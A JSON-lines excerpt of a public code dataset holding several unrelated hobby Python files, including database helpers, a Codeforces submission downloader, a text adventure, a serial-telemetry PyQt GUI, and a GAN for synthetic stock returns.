OFFSET ? \"\"\"\n\nINSERT_PROJECT_SQL = \"\"\" INSERT INTO projects(uuid, id, 'name', info) VALUES(?,?,?,?) \"\"\"\n\n\ndef get_projects(**kwargs):\n page = kwargs['page'] if 'page' in kwargs else 10\n page_size = kwargs['page_size'] if 'page_size' in kwargs else 0\n print(page)\n print(page_size)\n return get_cursor().execute(SELECT_PROJECTS_SQL, (page, page_size * page)).fetchall()\n\n\ndef add_project(project):\n # https://docs.gitlab.com/ee/api/projects.html#get-single-project\n print(\"add_project\")\n print(project)\n uuid = uuid4()\n name = project['path_with_namespace']\n id = project['id']\n get_cursor().execute(INSERT_PROJECT_SQL, (str(uuid), int(id), name, dumps(project)))\n commit_db()\n\n\ndef get_project_by_id(id):\n return get_cursor().execute(\"Select * from projects where id= ? ;\", (str(id),)).fetchone()\n\n\ndef get_project_by_uuid(uuid):\n return get_cursor().execute(\"Select * from projects where uuid=? ;\", uuid)\n\n\ndef update_project_pipeline(id, branch, steps, env):\n # steps & env already stringified\n get_cursor().execute(\" UPDATE projects set build_branch= ?, pipeline_steps= ?, pipeline_envs= ? where id=? \",\n (branch, steps, env, id))\n commit_db()\n","repo_name":"380sq/minim","sub_path":"db/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32972480091","text":"# download CF submissions\n# use with 'python3 grader.py -g ok'\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport sys\nimport time\n\ndef parse(url):\n\tpage = urllib.request.urlopen(url)\n\treturn BeautifulSoup(page,'html.parser')\n\nsep='-'*50\nprefix=\"https://codeforces.com/contest/\"\ncontest=\"1294\"\nprob=\"C\"\npage=\"130\"\n\ndef subs(page):\n\turl = prefix+contest+\"/status/\"+prob+\"/page/\"+page\n\tsoup = parse(url)\n\tsubs = soup.body.findAll('tr',attrs={'data-submission-id': True})\n\tL = []\n\tfor s in subs:\n\t\tL.append(s['data-submission-id'])\n\treturn L\n\nL = subs(page)\nfor sub in L:\n\turl = prefix+contest+\"/submission/\"+sub\n\tsoup = parse(url)\n\ttable = soup.body.find('table')\n\tcpp = None\n\tcnt = 0\n\tfor b in table.findAll('td'):\n\t\tcnt += 1\n\t\tif cnt == 4:\n\t\t\tlang = b.text.strip()\n\tname = \"\"\n\tif 'C++' in lang:\n\t\tname = sub+\".cpp\"\n\telif (\"Python\" in lang or \"PyPy\" in lang) and \"3\" in lang:\n\t\tname = sub+\".py\"\n\telif \"Java\" in lang:\n\t\tname = sub+\".java\"\n\tif len(name) > 0:\n\t\tprog = soup.body.find('pre',attrs={'id':\"program-source-text\"}).text\n\t\tif 'C++' in lang:\n\t\t\tprog = prog.replace(\"%I64d\",\"%lld\")\n\t\t\tprog = prog.replace(\"ONLINE_JUDGE\",\"OJOJ\")\n\t\tif 'Java' in lang: # needs to be fixed\n\t\t\tname = \"j\"+name\n\t\t\tclen = 1\n\t\t\twhile clen < 100:\n\t\t\t\tdes = 'public'+(' '*clen)+'class '\n\t\t\t\tind = prog.find(des)\n\t\t\t\tif ind == -1:\n\t\t\t\t\tclen += 1\n\t\t\t\t\tcontinue\n\t\t\t\tL = ind+len(des)\n\t\t\t\twhile prog[L].isspace():\n\t\t\t\t\tL += 1\n\t\t\t\tR = L\n\t\t\t\twhile not prog[R].isspace() and prog[R] != '{':\n\t\t\t\t\tR += 1\n\t\t\t\tprog = prog[:L]+\"j\"+sub+prog[R:]\n\t\t\t\tbreak\n\t\t\tassert clen < 100, \"public class not found\"\n\t\twith open(name, \"w\") as f:\n\t\t\tf.write(prog)\n\t\tprint(sub+\": \"+lang+\", OK\")\n\telse:\n\t\tprint(sub+\": \"+lang+\", NOT OK\")\n\ttime.sleep(0.5)","repo_name":"bqi343/cp-notebook","sub_path":"Contests/Tools/CF/cf_subs.py","file_name":"cf_subs.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":2202,"dataset":"github-code","pt":"54"} +{"seq_id":"26666054781","text":"A = {\"one\": \"eon\", \"two\": \"two\", \"four\": True}\nB = {\"two\": \"own\", \"zero\": 4, \"four\": True}\n\ndef gen_diff(A, B):\n C = {}\n C.update(A)\n C.update(B)\n for key, value in A.items():\n if key in B.keys() and value in B.values():\n C.update({key: 'unchanged'})\n elif key in B.keys() and value not in B.values():\n C.update({key: 'changed'})\n elif key not in B.keys():\n C.update({key: 'deleted'})\n\n for key in B:\n if key not in A.keys():\n C.update({key: 'added'})\n\n return C\n\nprint(gen_diff(A, B))\n\n\n'''\nРеализуйте функцию gen_diff, которая сравнивает два словаря и возвращает результат сравнения в виде словаря. \nКлючами результирующего словаря будут все ключи из двух входящих, а значением строка с описанием отличий: \nadded, deleted, changed или unchanged.\n\nВозможные значения:\n\nadded — ключ отсутствовал в первом словаре, но был добавлен во второй\ndeleted — ключ был в первом словаре, но отсутствует во втором\n+++ changed — ключ присутствовал и в первом и во втором словаре, но значения отличаются\n+++ unchanged — ключ присутствовал и в первом и во втором словаре с одинаковыми значениями\nПример работы:\n\nfrom solution import gen_diff\n\ngen_diff(\n {\"one\": \"eon\", \"two\": \"two\", \"four\": True},\n {\"two\": \"own\", \"zero\": 4, \"four\": True},\n)\n# {\"one\": \"deleted\", \"two\": \"changed\", \"four\": \"unchanged\", \"zero\": \"added\"}\n'''","repo_name":"AntonTyurin87/hexlet-git","sub_path":"exercises/gen_diff.py","file_name":"gen_diff.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39334720009","text":"#from adventurelib import *\nimport adventurelib2 as a\nimport random\nimport PySimpleGUI as sg\na.Room.items = a.Bag()\n\n# each room shall have a image-filename attribute\n\ncurrent_room = starting_room = a.Room(\"\"\"\nYou are in a dark room.\n\"\"\", image=\"dark.png\")\n\n\nvalley = starting_room.north = a.Room(\"\"\"\nYou are in a beautiful valley.\n\"\"\", image=\"valley.png\")\n\nmagic_forest = valley.north = a.Room(\"\"\"\nYou are in a enchanted forest where magic grows wildly.\n\"\"\", image=\"forest.png\")\n\ncave = magic_forest.north = a.Room(\"\"\"\nYou are inside a dark cave.\nYou hear a waterfall nearby\"\"\", image=\"cave.png\")\n\n\nmallet = a.Item('rusty mallet', 'mallet')\nvalley.items = a.Bag({mallet,})\n\nwizard = a.Item('wizard', 'the wizard', 'a wizard')\nwizard.answers = [\"Geht so\", \"jaja\", \"akra-ka-babra!\"]\n\n# a bag is a python SET !!\nmagic_forest.items = a.Bag({wizard,}) # ITEMS must be in a bag\n\ninventory = a.Bag()\n\n\n@a.when('north', direction='north')\n@a.when('south', direction='south')\n@a.when('east', direction='east')\n@a.when('west', direction='west')\ndef go(direction):\n global current_room\n room = current_room.exit(direction)\n if room:\n current_room = room\n a.say('You go %s.' % direction)\n look()\n if room == magic_forest:\n a.set_context('magic_aura')\n else:\n a.set_context('default')\n\n\n@a.when('take ITEM')\ndef take(item):\n if item == \"wizard\":\n a.say(\"The wizard does not want to be picked up by you\")\n return\n obj = current_room.items.take(item)\n if obj:\n a.say('You pick up the %s.' % obj)\n inventory.add(obj)\n else:\n a.say('There is no %s here.' % item)\n\n@a.when(\"talk\", thing=None)\n@a.when(\"talk to\", thing=None)\n@a.when(\"talk THING\")\n@a.when(\"talk to THING\")\ndef talk(thing):\n if thing == None:\n a.say(\"You talk a bit to yourself\")\n return\n # check if the thing is in the inventory or in the current room\n # inventory and room.items are SET's. to merge them, I use pythons join command\n for i in inventory.union(current_room.items):\n if thing in i.aliases:\n exist = True\n break\n else:\n # else in a for loop means the whole loop was interrated trough, without any break\n a.say(\"there is no {} to talk to, neither in your inventory nor in this room/location\".format(thing))\n return\n # the thing exist. thing is a string, i is the object\n a.say(\"you talk to {}...\".format(thing))\n # check if object i (the item) has the .answers attribute\n if \"answers\" in i.__dict__.keys():\n a.say(\"and the {} says: '{}'\".format(thing, random.choice(i.answers)))\n else:\n a.say(\"but you get no reply. None at all. It seems that the {} is unable to talk\".format(thing))\n\n\n\n\n\n@a.when('drop THING')\ndef drop(thing):\n obj = inventory.take(thing)\n if not obj:\n a.say('You do not have a %s.' % thing)\n else:\n a.say('You drop the %s.' % obj)\n current_room.items.add(obj)\n\n\n@a.when('look')\ndef look():\n a.say(current_room)\n #a.say(\"image: {}\".format(current_room.image))\n if current_room.items:\n for i in current_room.items:\n a.say('A %s is here.' % i)\n\ndef command_list():\n return [c for c in commands]\n\ndef inventory_list():\n return [i for i in inventory]\n\n@a.when('inventory')\ndef show_inventory():\n a.say('You have:')\n for thing in inventory:\n a.say(thing)\n\n@a.when('cast', magic=None, context='magic_aura')\n@a.when(\"cast MAGIC\", context='magic_aura')\ndef cast(magic):\n if magic == None:\n a.say(\"Which magic you would like to spell?\")\n elif magic == \"fireball\":\n a.say(\"you cast a flaming Fireball! Woooosh....\")\n\n# ------------------ GUI ------------------\n\ndirections = [\n [sg.Text(\"\", size=(15,1)),sg.Button(\"North\", size=(10,1)), sg.Text(\"\",size=(15,1))],\n [sg.Button(\"West\", size=(10,1)),sg.Text(\"\", size=(15,1)),sg.Button(\"East\",size=(10,1))],\n [sg.Text(\"\", size=(15,1)),sg.Button(\"South\", size=(10,1)), sg.Text(\"\",size=(15,1))],\n [sg.Text(\"valid commands\", size=(20,1)), sg.Text(\"your items:\", size=(20,1))],\n [sg.Listbox(key=\"help\", size=(20,10), values=[]), sg.Listbox(key=\"inventory\", values=[], size=(20,10))] ,\n ]\n\nlayout = [\n [sg.Text(\"Adventure - press start to begin\", key=\"header\",)],\n [sg.Output(key=\"output\", size=(70,20)),sg.Col(layout=directions)],\n [sg.InputText(key=\"command\", size=(70, 2), do_not_clear=False),\n sg.Button(\"execute\", bind_return_key=True)],\n [sg.Button(\"Start\"), sg.Button(\"Cancel\"), sg.Button(\"test\")],\n ]\n\nwindow = sg.Window(title=\"Adventuregame\", layout=layout)\n\nwhile True:\n event, values = window.read()\n if event in [None, \"Cancel\"]:\n break\n if event == \"Start\":\n window[\"header\"].update(\"Game is running\")\n a.say(\"starting a new adventure\")\n #a.start()\n look()\n if event == \"execute\":\n a._handle_command(values[\"command\"].strip())\n if event == \"test\":\n ugly = a._available_commands()\n print(ugly)\n #for t in ugly:\n # print(t[0]])\n a.help()\n # update command and help list\n window[\"help\"].update(a.helplist())\n window[\"inventory\"].update(inventory_list())\n \nwindow.close()\nprint(\"bye\")\n\n# --------- adventure start ------\n\n","repo_name":"horstjens/adventure","sub_path":"horstgame2.py","file_name":"horstgame2.py","file_ext":"py","file_size_in_byte":5400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43135127860","text":"import sys\nfrom PyQt6 import QtCore, QtGui, QtWidgets\nimport serial\nimport pyqtgraph as pg\n\nser = serial.Serial('COM3', baudrate=9600, timeout=1)\n\n\ndef send_command(button_number):\n # İlk byte buton numarasına eşit olmalıdır.\n first_byte = button_number\n\n # İkinci byte, ilk byte'ın bitlerinin tersi olmalıdır.\n second_byte = ~button_number & 0xFF\n\n # 2 byte'lık paketi gönder\n ser.write(bytes([first_byte, second_byte]))\n\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.setGeometry(30, 300, 400, 550)\n self.setWindowTitle(\"Real-Time Data Plotting\")\n self.graphWidget = pg.PlotWidget()\n self.setCentralWidget(self.graphWidget)\n self.graphWidget.setBackground('w')\n self.graphWidget.showGrid(x=True, y=True)\n self.graphWidget.setLabel('left', 'Values')\n self.graphWidget.setLabel('bottom', 'Time')\n self.graphWidget.setTitle('Real-Time Data Plotting')\n\n\n\n self.latitude = []\n self.longitude = []\n self.speed = []\n self.acceleration = []\n self.temperature = []\n self.time = []\n\n self.pen = pg.mkPen(color=(255, 0, 0))\n self.plotLatitude = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(0, 255, 0))\n self.plotLongitude = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(0, 0, 255))\n self.plotSpeed = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(255, 255, 0))\n self.plotAcceleration = self.graphWidget.plot(pen=self.pen)\n self.pen = pg.mkPen(color=(255, 0, 255))\n self.plotTemperature = self.graphWidget.plot(pen=self.pen)\n\n def update_data(self, values):\n self.latitude.append(float(values[0]))\n self.longitude.append(float(values[1]))\n self.speed.append(float(values[2]))\n self.acceleration.append(float(values[3]))\n self.temperature.append(float(values[4]))\n self.time.append(float(len(self.time) + 1))\n\n self.plotLatitude.setData(self.time, self.latitude)\n self.plotLongitude.setData(self.time, self.longitude)\n self.plotSpeed.setData(self.time, self.speed)\n self.plotAcceleration.setData(self.time, self.acceleration)\n self.plotTemperature.setData(self.time, self.temperature)\n\n def closeEvent(self, event):\n sys.exit()\n\nclass DataThread(QtCore.QThread):\n def __init__(self, serial, window):\n super().__init__()\n self.serial = serial\n self.window = window\n self.running = True\n\n def run(self):\n while self.running:\n try:\n # Read line from serial port\n line = self.serial.readline().decode().strip()\n\n # Split line into values\n values = line.split(\",\")\n\n # Update data\n self.window.update_data(values)\n except:\n pass\n\n def stop(self):\n self.running = False\n self.wait()\n\nclass SerialPort(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n # Create widgets\n self.baudrate_label = QtWidgets.QLabel(\"Baudrate:\")\n self.baudrate_combo = QtWidgets.QComboBox()\n self.baudrate_combo.addItems([\"9600\", \"19200\", \"38400\", \"57600\", \"115200\"])\n self.connect_button = QtWidgets.QPushButton(\"Connect\")\n self.disconnect_button = QtWidgets.QPushButton(\"Disconnect\")\n self.disconnect_button.setEnabled(False)\n\n # Create layout\n hbox = QtWidgets.QHBoxLayout()\n hbox.addWidget(self.baudrate_label)\n hbox.addWidget(self.baudrate_combo)\n hbox.addWidget(self.connect_button)\n hbox.addWidget(self.disconnect_button)\n\n # Create plot widgets\n self.latitude_plot = pg.PlotWidget()\n self.longitude_plot = pg.PlotWidget()\n self.speed_plot = pg.PlotWidget()\n self.acceleration_plot = pg.PlotWidget()\n self.temperature_plot = pg.PlotWidget()\n\n # Create layout for plot widgets\n plot_layout = QtWidgets.QGridLayout()\n plot_layout.addWidget(self.latitude_plot, 0, 0)\n plot_layout.addWidget(self.longitude_plot, 0, 1)\n plot_layout.addWidget(self.speed_plot, 1, 0)\n plot_layout.addWidget(self.acceleration_plot, 1, 1)\n plot_layout.addWidget(self.temperature_plot, 2, 0, 1, 2)\n\n # Set layout for main window\n vbox = QtWidgets.QVBoxLayout()\n vbox.addLayout(hbox)\n vbox.addLayout(plot_layout)\n self.setLayout(vbox)\n\n # Connect signals and slots\n self.connect_button.clicked.connect(self.connect_serial)\n self.disconnect_button.clicked.connect(self.disconnect_serial)\n\n def connect_serial(self):\n # Get selected baud rate\n baudrate = int(self.baudrate_combo.currentText())\n\n try:\n # Connect to serial port\n self.serial = serial.Serial('/dev/ttyACM0', baudrate)\n\n # Disable connect button and enable disconnect button\n self.connect_button.setEnabled(False)\n self.disconnect_button.setEnabled(True)\n\n # Create data thread and start it\n self.data_thread = DataThread(self.serial, self)\n self.data_thread.start()\n except serial.SerialException as e:\n QtWidgets.QMessageBox.critical(self, \"Error\", str(e))\n\n def disconnect_serial(self):\n # Stop data thread\n self.data_thread.stop()\n\n # Disconnect from serial port\n self.serial.close()\n\n # Enable connect button and disable disconnect button\n self.connect_button.setEnabled(True)\n self.disconnect_button.setEnabled(False)\n\n def update_data(self, values):\n # Update latitude plot\n self.latitude_plot.plot(values[0])\n\n # Update longitude plot\n self.longitude_plot.plot(values[1])\n\n # Update speed plot\n self.speed_plot.plot(values[2])\n\n # Update acceleration plot\n self.acceleration_plot.plot(values[3])\n\n # Update temperature plot\n self.temperature_plot.plot(values[4])\n\nclass SensorDataPlot(QtWidgets.QWidget):\n def init(self):\n super().init()\n self.init_ui()\n\n def init_ui(self):\n # Create latitude plot\n self.latitude_plot = pg.PlotWidget(title=\"Latitude\")\n self.latitude_plot.setLabel(\"left\", \"Latitude\", units=\"degrees\")\n self.latitude_plot.showGrid(x=True, y=True)\n\n # Create longitude plot\n self.longitude_plot = pg.PlotWidget(title=\"Longitude\")\n self.longitude_plot.setLabel(\"left\", \"Longitude\", units=\"degrees\")\n self.longitude_plot.showGrid(x=True, y=True)\n\n # Create speed plot\n self.speed_plot = pg.PlotWidget(title=\"Speed\")\n self.speed_plot.setLabel(\"left\", \"Speed\", units=\"m/s\")\n self.speed_plot.showGrid(x=True, y=True)\n\n # Create acceleration plot\n self.acceleration_plot = pg.PlotWidget(title=\"Acceleration\")\n self.acceleration_plot.setLabel(\"left\", \"Acceleration\", units=\"m/s^2\")\n self.acceleration_plot.showGrid(x=True, y=True)\n\n # Create temperature plot\n self.temperature_plot = pg.PlotWidget(title=\"Temperature\")\n self.temperature_plot.setLabel(\"left\", \"Temperature\", units=\"°C\")\n self.temperature_plot.showGrid(x=True, y=True)\n\n # Create layout\n grid = QtWidgets.QGridLayout()\n grid.addWidget(self.latitude_plot, 0, 0)\n grid.addWidget(self.longitude_plot, 0, 1)\n grid.addWidget(self.speed_plot, 1, 0)\n grid.addWidget(self.acceleration_plot, 1, 1)\n grid.addWidget(self.temperature_plot, 2, 0, 1, 2)\n self.setLayout(grid)\n\n def update_data(self, values):\n # Update latitude plot\n self.latitude_plot.plot(values[0])\n\n # Update longitude plot\n self.longitude_plot.plot(values[1])\n\n # Update speed plot\n self.speed_plot.plot(values[2])\n\n # Update acceleration plot\n self.acceleration_plot.plot(values[3])\n\n # Update temperature plot\n self.temperature_plot.plot(values[4])\n\nclass DataWindow(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n def init_ui(self):\n # Create plots\n\n self.latitude_plot = PlotWidget(\"Latitude\")\n self.longitude_plot = PlotWidget(\"Longitude\")\n self.speed_plot = PlotWidget(\"Speed\")\n self.acceleration_plot = PlotWidget(\"Acceleration\")\n self.temperature_plot = PlotWidget(\"Temperature\")\n\n # Create layout\n grid = QtWidgets.QGridLayout()\n grid.addWidget(self.latitude_plot, 0, 0)\n grid.addWidget(self.longitude_plot, 0, 1)\n grid.addWidget(self.speed_plot, 1, 0)\n grid.addWidget(self.acceleration_plot, 1, 1)\n grid.addWidget(self.temperature_plot, 2, 0, 1, 2)\n\n # Set layout\n self.setLayout(grid)\n def update_data(self, values):\n # Update latitude plot\n self.latitude_plot.plot(values[0])\n\n # Update longitude plot\n self.longitude_plot.plot(values[1])\n\n # Update speed plot\n self.speed_plot.plot(values[2])\n\n # Update acceleration plot\n self.acceleration_plot.plot(values[3])\n\n # Update temperature plot\n self.temperature_plot.plot(values[4])\n\nclass SecondWindow(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n # Eve Dön Butonu\n btn1 = QtWidgets.QPushButton('Eve Dön', self)\n btn1.move(30, 50)\n btn1.resize(100, 50)\n btn1.clicked.connect(lambda: self.sendCommand(1))\n\n # Görüntü Al Butonu\n btn2 = QtWidgets.QPushButton('Görüntü Al', self)\n btn2.move(150, 50)\n btn2.resize(100, 50)\n btn2.clicked.connect(lambda: self.sendCommand(2))\n\n # Hızlan Butonu\n btn3 = QtWidgets.QPushButton('Hızlan', self)\n btn3.move(270, 50)\n btn3.resize(100, 50)\n btn3.clicked.connect(lambda: self.sendCommand(3))\n\n # Eve Dön butonu fonksiyonu\n def eve_don(self):\n send_command(0x01) # 0x01 değeri \"Eve Dön\" butonunun numarasıdır.\n\n # Görüntü Al butonu fonksiyonu\n def goruntu_al(self):\n send_command(0x02) # 0x02 değeri \"Görüntü Al\" butonunun numarasıdır.\n\n # Hızlan butonu fonksiyonu\n def hizlan(self):\n send_command(0x03) # 0x03 değeri \"Hızlan\" butonunun numarasıdır.\n\n self.setGeometry(30, 20, 400, 150)\n self.setWindowTitle('Araç Kontrol Arayüzü')\n\nclass PlotWidget(QtWidgets.QWidget):\n def __init__(self, title):\n super().__init__()\n self.init_ui(title)\n\n def init_ui(self, title):\n # Create plot widget\n self.plot_widget = pg.PlotWidget(title=title)\n\n # Create plot curve\n self.plot_curve = self.plot_widget.plot()\n\n # Create layout\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(self.plot_widget)\n # Set layout\n self.setLayout(vbox)\n\n def plot(self, value):\n # Get current data from plot curve\n x_data, y_data = self.plot_curve.getData()\n\n # Add new data to plot curve\n x_data = pg.np.append(x_data, x_data[-1] + 1)\n y_data = pg.np.append(y_data, value)\n self.plot_curve.setData(x=x_data, y=y_data)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MainWindow()\n window2 = SecondWindow()\n serial_port = SerialPort()\n window.show()\n window2.show()\n serial_port.show()\n sys.exit(app.exec())\n","repo_name":"cagdassozturk/codes","sub_path":"yarışma.py","file_name":"yarışma.py","file_ext":"py","file_size_in_byte":11754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70276868641","text":"import torch\nfrom torch import nn\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom _param_dicts import *\nimport random\nimport numpy as np\n\n\nclass Discriminator(nn.Module):\n \"\"\"\n Discriminator\n\n Overall architecture:\n - 5 inputs\n - 128 neurons (ReLU with dropout 0.2)\n - 1024 neurons (Tanh with dropout 0.4)\n - 256 neurons (ReLU)\n - 1 output (sigmoid)\n\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.model = nn.Sequential(\n nn.Linear(5, 128), # 5 inputs\n nn.ReLU(),\n nn.Dropout(0.2),\n nn.Linear(128, 1024),\n nn.Tanh(),\n nn.Dropout(0.3),\n nn.Linear(1024, 256),\n nn.ReLU(),\n nn.Linear(256, 1), # 1 output\n nn.Sigmoid()\n )\n\n def forward(self, x):\n return self.model(x)\n \n\nclass Generator(nn.Module):\n \"\"\"\n Generator\n \n Overall architecture:\n - 5 inputs\n - 128 neurons (ReLU with dropout 0.2)\n - 256 neurons (Tanh with dropout 0.4)\n - 1024 neurons (ReLU)\n - 5 outputs\n\n \"\"\"\n def __init__(self):\n\n\n super().__init__()\n self.model = nn.Sequential(\n nn.Linear(5, 128), # 5 inputs\n nn.ReLU(),\n nn.Dropout(0.2),\n nn.Linear(128, 256),\n nn.Tanh(),\n nn.Dropout(0.3),\n nn.Linear(256, 1024),\n nn.ReLU(),\n nn.Linear(1024, 5) # 5 outputs\n )\n\n def forward(self, x):\n return self.model(x)\n \n\nclass GAN():\n def __init__(\n self, \n data,\n train_size=0.8,\n epochs=300,\n batch_size=128,\n lr=0.001,\n b1=0.9,\n b2=0.999,\n clip_value=None,\n random_state=None\n ):\n \"\"\"\n Parameters:\n \n data : array-like, shape (n_samples, 6)\n data of log returns to train on\n final dimension is the label\n - 0 = fake\n - 1 = real\n\n train_size: : float, optional, default=0.8\n size of the training set\n\n epochs: : int, optional, default=1000\n number of epochs during training\n\n batch_size: : int, optional, default=128\n batch size for training\n\n lr: : float, optional, default=0.001\n learning rate for the optimizer\n\n b1: : float, optional, default=0.9\n beta 1 (for Adam optimizer)\n\n b2: : float, optional, default=0.999\n beta 2 (for Adam optimizer)\n\n clip_value: : float, optional, default=None\n clip value for the weights of the discriminator\n\n random_state: : int, optional, default=None\n random state for reproducibility\n\n Attributes:\n\n train_set : training set of length train_size * n_samples\n\n test_set : test set of length (1 - train_size) * n_samples\n\n device : device to use (GPU or CPU)\n\n generator : generator model\n\n discriminator : discriminator model\n\n adversarial_loss : loss function (binary cross entropy loss)\n\n optimizer_G : optimizer for the generator (Adam optimizer)\n\n optimizer_D : optimizer for the discriminator (Adam optimizer)\n\n\n Methods:\n\n train(self, verbose) : trains the model\n verbose : int, optional, default=False\n if 1, prints the loss at each epoch\n if 2, prints the loss at each batch\n\n sample(self, n_samples) : generates n_samples of fake data\n\n\n \"\"\"\n\n if random_state is not None:\n torch.manual_seed(random_state)\n \n self.data = torch.tensor(data.values).float()\n\n self.train_size = train_size\n \n self.train_set, self.test_set = torch.utils.data.random_split(self.data,\n [\n int(len(self.data) * self.train_size),\n len(self.data) - int(len(self.data) * self.train_size)\n ]\n )\n \n self.epochs = epochs \n self.batch_size = batch_size \n self.lr = lr \n self.b1 = b1 \n self.b2 = b2 \n \n self.clip_value = clip_value \n \n \n self.device = torch.device(\n \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n ) # if GPU is available, use it\n\n self.generator = Generator().to(self.device)\n self.discriminator = Discriminator().to(self.device)\n self.adversarial_loss = nn.BCELoss() # binary cross entropy loss\n\n self.optimizer_G = torch.optim.Adam(\n self.generator.parameters(),\n lr=self.lr,\n betas=(self.b1, self.b2)\n )\n\n self.optimizer_D = torch.optim.Adam(\n self.discriminator.parameters(),\n lr=self.lr,\n betas=(self.b1, self.b2)\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.train_set,\n batch_size=self.batch_size,\n shuffle=True\n )\n\n\n\n def train(self, verbose=0):\n for epoch in range(self.epochs):\n for n, real_samples in enumerate(self.train_loader):\n\n # data for training the discriminator\n real_samples_labels = torch.ones((self.batch_size, 1))\n latent_space_samples = torch.randn((self.batch_size, 5))\n gen_samples = self.generator(latent_space_samples)\n gen_sample_labels = torch.zeros((self.batch_size, 1))\n\n # make sure the real_sampeles and gen_samples are the same size\n if len(real_samples) != len(gen_samples):\n r_len, g_len = len(real_samples), len(gen_samples)\n length = min(r_len, g_len)\n real_samples = real_samples[:length]\n gen_samples = gen_samples[:length]\n real_samples_labels = real_samples_labels[:length]\n gen_sample_labels = gen_sample_labels[:length]\n\n all_samples = torch.cat((real_samples, gen_samples))\n all_sample_labels = torch.cat((\n real_samples_labels,\n gen_sample_labels\n ))\n\n\n # ---------------------\n # Train Discriminator\n # ---------------------\n\n self.discriminator.zero_grad()\n self.optimizer_D.zero_grad()\n\n output_D = self.discriminator(all_samples)\n\n loss_D = self.adversarial_loss(output_D, all_sample_labels)\n loss_D.backward()\n\n self.optimizer_D.step()\n\n # Clip weights of discriminator\n if self.clip_value is not None:\n for p in self.discriminator.parameters():\n p.data.clamp_(-self.clip_value, self.clip_value)\n\n # -----------------\n\n # data for training the generator\n \n if self.batch_size != len(real_samples):\n latent_space_samples = torch.randn((len(real_samples), 5))\n else:\n latent_space_samples = torch.randn((self.batch_size, 5))\n\n # -----------------\n # Train Generator\n # -----------------\n\n self.generator.zero_grad()\n self.optimizer_G.zero_grad()\n\n generated_samples = self.generator(latent_space_samples)\n output_D_generated = self.discriminator(generated_samples)\n\n loss_G = self.adversarial_loss(output_D_generated, real_samples_labels)\n\n loss_G.backward()\n self.optimizer_G.step()\n\n if verbose == 2:\n print(\n \"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]\"\n % (epoch+1, self.epochs, n, len(self.train_loader), loss_D.item(), loss_G.item())\n )\n \n if verbose == 1:\n print(\n \"[Epoch %d/%d] [D loss: %f] [G loss: %f]\"\n % (epoch+1, self.epochs, loss_D.item(), loss_G.item())\n )\n\n\n\n def sample(self, n_samples, plot=False):\n \"\"\"\n Generates n_samples of fake data\n \"\"\"\n noise = torch.randn(n_samples, 5).to(self.device)\n if plot:\n plt.plot(self.generator(noise).cpu().detach().numpy().T)\n plt.show()\n\n return self.generator(noise)\n \n\n def save_model(self, path):\n \"\"\"\n Save the model as a 'pt` file\n \"\"\"\n if not path.endswith('.pt'):\n path += '.pt'\n\n torch.save(self.generator.state_dict(), path)\n\n\ndef main():\n \n data = pd.read_csv('Data/real_returns.csv').drop('Unnamed: 0', axis=1).T\n\n d = {\n 'data': [data],\n 'train_size': [0.7, 0.8, 0.9, 0.95],\n 'epochs': [25, 50, 100, 200, 250, 300, 400, 500],\n 'batch_size': [32, 64, 128, 256, 512, 1024],\n 'lr': [0.0001, 0.0005, 0.001, 0.005, 0.01],\n 'b1': [0.5, 0.6, 0.7, 0.8, 0.9],\n 'b2': [0.9, 0.95, 0.99, 0.999, 0.9999, 0.99999],\n 'clip_value': [0.01, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, None],\n 'random_state': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n }\n\n\n for i in range(100):\n params = {}\n for k in d.keys():\n params[k] = random.choice(d[k])\n\n print(i+1)\n gan = GAN(**params)\n gan.train(full_verbose=True)\n samps = gan.sample(1000)\n samps = pd.DataFrame(samps.detach().numpy())\n samps.to_csv(f'Data/fake_returns_GAN_{i+1}.csv')\n gan.save_model(f'model_{i+1}.pt')\n\n \n # print(gan.data.shape)\n # print(len(gan.train_set), len(gan.test_set[1]))\n # print(len(gan.test_set), len(gan.test_set[1]))\n # print(gan.discriminator)\n # print(gan.generator)\n gan.train(full_verbose=True)\n\n fake_data = gan.sample(100, plot=True)\n\n fake_data = pd.DataFrame(fake_data.detach().numpy())\n print(fake_data.shape)\n print(fake_data)\n fake_data.to_csv('Data/fake_returns_GAN.csv')\n\n gan.save_model('model.pt')\n\nif __name__ == '__main__':\n main()","repo_name":"rshea33/FA-691","sub_path":"Final Project/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":10200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74005295202","text":"# from operator import add\nimport os\nfrom flask import Flask, render_template, request\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom forms import SubmitAddressForm\n\napp = Flask(__name__)\ncsrf = CSRFProtect(app)\n\n# adding secret key to use csrf\nSECRET_KEY = os.urandom(32)\napp.config['SECRET_KEY'] = SECRET_KEY\n\n# setting the environments and configuring databases 